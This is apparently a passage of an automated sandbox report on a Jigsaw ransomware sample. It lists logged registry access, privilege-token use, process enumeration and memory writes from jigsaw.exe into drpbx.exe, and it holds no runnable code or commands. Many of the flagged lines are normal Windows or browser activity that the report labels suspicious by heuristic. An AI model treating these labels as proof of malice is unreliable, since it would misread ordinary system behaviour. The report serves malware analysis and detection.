Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\System32\spoolsv.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Send To OneNote 2016 = "winspool,nul:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Send To OneNote 2016 = "winspool,nul:" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Send To OneNote 2016 = "winspool,nul:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Send To OneNote 2016 = "winspool,nul:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices C:\Windows\System32\spoolsv.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4028 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
PID 4028 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
PID 3548 wrote to memory of 468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 4016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 4016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
